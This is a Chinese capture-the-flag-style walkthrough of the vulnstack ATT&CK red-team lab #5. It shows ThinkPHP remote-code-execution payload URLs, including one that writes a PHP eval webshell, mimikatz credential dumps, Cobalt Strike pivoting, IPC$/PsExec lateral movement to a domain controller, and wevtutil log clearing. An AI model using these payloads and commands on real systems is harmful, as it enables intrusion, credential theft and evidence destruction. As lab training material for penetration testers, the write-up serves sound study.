ATT&CK红队评估实战靶场(五)

企业开发 2023-12-18 00:35:33 阅读次数: 0

环境搭建

下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/

网络配置

VMnet2和VMnet3 来配置IP
在这里插入图片描述

WIN7 配置两张网卡 VMnet2和VMnet3 192.168.135.0,192.168.138.0
WIN2008 只配置 VMnet2 192.168.135.0

web渗透

thinkphp 漏洞利用

通过报错了判断thinkphp版本
在这里插入图片描述

执行命令payload

http://192.168.135.150/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

写文件payload

http://192.168.135.150/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&&vars[1][]=<?php eval($_POST['a']);?>

在这里插入图片描述
在这里插入图片描述

内网渗透

信息收集

ipconfig /all

在这里插入图片描述

fscan扫描

在这里插入图片描述

shell fscan64.exe -h 192.168.138.0/24

(icmp) Target 192.168.138.136 is alive
(icmp) Target 192.168.138.138 is alive
192.168.138.136:445 open
192.168.138.138:88 open
192.168.138.136:3306 open
192.168.138.138:445 open
192.168.138.138:139 open
192.168.138.1:135 open
192.168.138.138:135 open
192.168.138.136:139 open
192.168.138.136:135 open
192.168.138.136:80 open

[+] 192.168.138.136	MS17-010	(Windows 7 Professional 7601 Service Pack 1)
[*] WebTitle:http://192.168.138.136    code:200 len:931    title:None
[+] NetInfo:
[*]192.168.138.138
   [->]DC
   [->]192.168.138.138
[+] NetInfo:
[*]192.168.138.1
   [->]xian
   [->]192.168.32.1
   [->]192.168.78.1
   [->]192.168.0.101
   [->]192.168.135.1
   [->]192.168.138.1
[*] 192.168.138.136      SUN\WIN7              Windows 7 Professional 7601 Service Pack 1
[*] 192.168.138.1        WORKGROUP\XIAN              
[+] 192.168.138.138	MS17-010	(Windows Server 2008 HPC Edition 7600)
[*] 192.168.138.138[+]DC SUN\DC                Windows Server 2008 HPC Edition 7600

08/06 13:22:00 [+] received output:
[+] http://192.168.138.136 poc-yaml-thinkphp5-controller-rce 
[+] http://192.168.138.136 poc-yaml-thinkphp5023-method-rce poc1

内网总共两台机器,192.168.138.138为域控,192.168.138.136为WIN7域内成员机器

logonpasswords获取密码

使用CS自带的mimikatz读取密码

Authentication Id : 0 ; 277548 (00000000:00043c2c)
Session           : CachedInteractive from 1
User Name         : Administrator
Domain            : SUN
Logon Server      : DC
Logon Time        : 2023/8/6 12:44:26
SID               : S-1-5-21-3388020223-1982701712-4030140183-500
	msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : SUN
	 * LM       : c8c42d085b5e3da2e9260223765451f1
	 * NTLM     : e8bea972b3549868cecd667a64a6ac46
	 * SHA1     : 3688af445e35efd8a4d4e0a9eb90b754a2f3a4ee
	tspkg :	
	 * Username : Administrator
	 * Domain   : SUN
	 * Password : dc123.com
	wdigest :	
	 * Username : Administrator
	 * Domain   : SUN
	 * Password : dc123.com
	kerberos :	
	 * Username : Administrator
	 * Domain   : SUN.COM
	 * Password : dc123.com
	ssp :	
	credman :	

Authentication Id : 0 ; 153942 (00000000:00025956)
Session           : Interactive from 1
User Name         : leo
Domain            : SUN
Logon Server      : DC
Logon Time        : 2023/8/6 12:41:12
SID               : S-1-5-21-3388020223-1982701712-4030140183-1110
	msv :	
	 [00000003] Primary
	 * Username : leo
	 * Domain   : SUN
	 * LM       : b73a13e9b7832a35aad3b435b51404ee
	 * NTLM     : afffeba176210fad4628f0524bfe1942
	 * SHA1     : fa83a92197d9896cb41463b7a917528b4009c650
	tspkg :	
	 * Username : leo
	 * Domain   : SUN
	 * Password : 123.com
	wdigest :	
	 * Username : leo
	 * Domain   : SUN
	 * Password : 123.com
	kerberos :	
	 * Username : leo
	 * Domain   : SUN.COM
	 * Password : 123.com
	ssp :	
	credman :

获取到两个用户的账户密码

* Username : Administrator
* Domain   : SUN
* Password : dc123.com
* SID: S-1-5-21-3388020223-1982701712-4030140183-500

* Username : leo
* Domain   : SUN.COM
* Password : 123.com
* SID: S-1-5-21-3388020223-1982701712-4030140183-1110

hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
heart:1000:aad3b435b51404eeaad3b435b51404ee:a34efdd63a23abea4413ba73cafa5a30:::

CobaltStrike中转监听

选择Pivoting -> Listener 新建,已当前192.168.138.136这台内网机器为中转

在这里插入图片描述

在这里插入图片描述

生成Payload

在这里插入图片描述

在这里插入图片描述

IPC$横向渗透

使用获取到的账户密码进行横向渗透

net use \\192.168.138.138\ipc$ dc123.com /user:sun\administrator

使用密码建立IPC
在这里插入图片描述

将生成的payload上传到内网机器,通过建立IPC$复制文件到DC机器上

shell copy C:\windows\temp\beacon.exe \\192.168.138.138\C$\windows\temp\

在这里插入图片描述

查看是否复制成功

shell dir \\192.168.138.138\C$\windows\temp

在这里插入图片描述

PsExec执行文件 获取DC域控

通过PsExe执行命令,上线CS

shell C:\windows\temp\PsExec.exe \\192.168.138.138 /accepteula -u sun\administrator -p dc123.com -d C:\windows\temp\beacon.exe

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

日志清理

统计日志列表,查询所有日志信息,包含时间数目
wevtutil gli Application

查看指定类型日志内容
wevtutil qe /f:text Application

删除该类型日志所有内容
wevtutil cl Application

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

执行删除所有日志信息,Application的 numberOfLogRecords: 0 为0 清除成功

猜你喜欢

转载自blog.csdn.net/qq_18193739/article/details/132132216
今日推荐
NetBSD 禁止提交由 AI 生成的代码
Apache Doris 2.0.10 版本正式发布!
开源日报 | 大模型开战;大模型独角兽被曝卖身;周鸿祎建议谷歌开源所有产品;最大开源AI社区提供1000万美元共享GPU
开源日报 | Chrome内置Gemini的意义不在于Gemini;中国AI追随之路的五大误区;ECharts创始人“下海”养鱼;谷歌I/O开发者大会什么都有,只是没有惊喜
微软回应中国区AI团队“打包赴美”传闻
基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个!
周排行
static方法和非static方法的区别(java)
如何查找计算机专业paper
java.lang.ClassFormatError: Incompatible magic value 0 in class file com/sitecha
跳跃游戏II
stm32_之【建立工程】
TeaWeb v0.0.9 发布,统计底层优化、主机监控功能改进
事件分发 -----控制字体大小
JavaScript DOM练习(动态表格添加) December 25,2019
JSF Scope & CDI
实现从零搭建一个登录注册页面(附源代码)
每日归档
更多
2024-05-19(0)
2024-05-18(4)
2024-05-17(34)
2024-05-16(6)
2024-05-15(24)
2024-05-14(0)
2024-05-13(18)
2024-05-12(0)
2024-05-11(38)
2024-05-10(38)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022